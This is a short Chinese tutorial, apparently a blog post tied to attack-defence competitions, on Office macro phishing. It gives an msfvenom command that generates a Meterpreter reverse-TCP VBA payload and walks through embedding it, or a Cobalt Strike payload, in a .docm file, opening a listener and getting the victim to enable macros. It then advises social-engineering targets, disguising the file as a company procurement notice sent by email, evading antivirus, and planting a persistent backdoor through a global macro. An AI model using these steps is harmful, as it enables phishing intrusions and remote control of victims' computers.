今年参加了几次攻防演练对抗赛,其它队伍依靠社工结合文件钓鱼得了不少分,自己之前并没有相关知识的积累,因此在这个方面吃了一些亏。
office宏攻击宏是微软公司为其OFFICE软件包设计的一个特殊功能,有着独特的文件后缀名,如:xlsm,docm,pptm等。
1、msf生成payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip地址 LPORT=端口 -f vba -o nouyan.vba-f指定生成vba宏语言的攻击payload
首先新建一个支持文件宏的office文件,以.docm进行演示。
首先选择文件-选项-自定义功能区-开发工具。
点击宏按钮,创建一个新的文件宏。
把msf生成的宏代码复制到代码框中。
保存文件,一个msf的反弹文件制作完成。
msf开启监听。
打开生成的1.docm文档。
出现安全警告,提升宏被禁用,点击启用内容。
成功上线。
2、cs生成payload
cs也支持生成office宏代码。
选择一个监听器,直接复制代码到宏代码框中。
上线成功。
实战
类似office宏还有一些其它利用方式,如DOCX文档远程模板注入执行宏,还可以通过shellcode进行免杀处理。
在实战中,首先尽可能社工目标的各种信息,取得对方信任,根据钓鱼的目标,修改文档的名字,通过邮箱进行发送,如xx公司采购说明。
office宏钓鱼存在几大不适用性:
1、对方电脑未使用office。
2、office默认禁用宏,打开文件会进行提示。
3、独特的宏文件后缀,docm,xlsm等,容易引起他人怀疑。
4、免杀性要求较高。
全局宏建立持久性后门
office宏除了用于钓鱼,还可以用来建立隐蔽的持久性后门。
新建一个宏,位置要选择所有活动模版和文档。